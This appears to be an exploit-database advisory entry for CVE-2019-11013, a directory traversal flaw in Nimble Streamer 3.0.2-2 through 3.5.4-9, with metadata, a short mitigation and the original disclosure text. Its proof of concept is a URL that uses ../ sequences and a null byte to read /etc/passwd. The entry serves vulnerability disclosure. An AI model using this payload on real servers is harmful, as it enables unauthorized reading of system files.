Nimble Streamer 3.0.2-2 to 3.5.4-9 - Path Traversal

vendor:

Nimble Streamer

by:

MAYASEVEN

6.5

CVSS

MEDIUM

Path Traversal

CWE

Product Name: Nimble Streamer

Affected Version From: 3.0.2-2

Affected Version To: 3.5.4-9

Patch Exists: YES

Related CWE: CVE-2019-11013

CPE: Nimble Streamer

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Tested on 3.5.4-9

2019

Nimble Streamer 3.0.2-2 to 3.5.4-9 – Path Traversal

Nimble Streamer 3.0.2-2 through 3.5.4-9 has a ../ directory traversal vulnerability. Successful exploitation could allow an attacker to traverse the file system to access files or directories that are outside of the restricted directory on the remote server.

Mitigation:

Restrict access to the vulnerable directory and ensure that the directory is not accessible from the web.

Source

Exploit-DB raw data:

# Nimble Streamer 3.0.2-2 to 3.5.4-9 - Path Traversal
# Exploit Author: MAYASEVEN
# Source at "https://mayaseven.com/nimble-directory-traversal-in-nimble-streamer-version-3-0-2-2-to-3-5-4-9/"
# Published on 08/04/2019
# Vendor Homepage at "https://wmspanel.com/nimble"
# Affected Version 3.0.2-2 to 3.5.4-9
# Tested on 3.5.4-9
# CVE-2019-11013 Nimble Streamer 3.0.2-2 to 3.5.4-9 Path Traversal
# Description: Nimble Streamer 3.0.2-2 through 3.5.4-9 has a ../ directory traversal vulnerability.
#              Successful exploitation could allow an attacker to traverse the file system to access
#              files or directories that are outside of the restricted directory on the remote server.


POC :
 - http://somesite.com/demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448